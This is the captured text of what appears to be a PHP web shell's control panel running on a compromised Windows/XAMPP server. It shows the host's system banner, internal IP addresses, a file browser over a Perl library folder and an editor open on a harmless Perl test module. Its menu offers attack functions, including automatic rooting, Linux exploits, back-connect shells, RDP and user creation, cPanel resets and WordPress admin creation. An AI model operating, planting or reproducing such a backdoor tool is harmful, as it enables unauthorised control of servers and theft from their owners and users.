Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Class /
[ HOME SHELL ]
Name
Size
Permission
Action
Accessor
[ DIR ]
drwxrwxrwx
C3
[ DIR ]
drwxrwxrwx
Data
[ DIR ]
drwxrwxrwx
Inspector
[ DIR ]
drwxrwxrwx
Load
[ DIR ]
drwxrwxrwx
MOP
[ DIR ]
drwxrwxrwx
Method
[ DIR ]
drwxrwxrwx
XSAccessor
[ DIR ]
drwxrwxrwx
Accessor.pm
20.15
KB
-rw-rw-rw-
C3.pm
18.06
KB
-rw-rw-rw-
ErrorHandler.pm
2.38
KB
-rw-rw-rw-
Inspector.pm
18.19
KB
-rw-rw-rw-
Load.pm
11.27
KB
-rw-rw-rw-
Loader.pm
5.61
KB
-rw-rw-rw-
LoaderTest.pm
648
B
-rw-rw-rw-
MOP.pm
38.32
KB
-rw-rw-rw-
Singleton.pm
12.16
KB
-rw-rw-rw-
Tiny.pm
17.5
KB
-rw-rw-rw-
XSAccessor.pm
10.22
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : LoaderTest.pm
#!/usr/bin/perl -sw ## ## ## ## Copyright (c) 2001, Vipul Ved Prakash. All rights reserved. ## This code is free software; you can redistribute it and/or modify ## it under the same terms as Perl itself. ## ## $Id: LoaderTest.pm,v 1.2 2001/05/01 00:09:12 vipul Exp $ package Class::LoaderTest; use Data::Dumper; sub new { my $self = { Method => 'new' }; return bless $self, shift; } sub foo { my ($class, $embed) = @_; $embed ||= 'foo'; my $self = { Method => $embed }; return bless $self, shift; } sub blah { my ($class, %params) = @_; my $self = { %params }; return bless $self, $class; } 1;
Close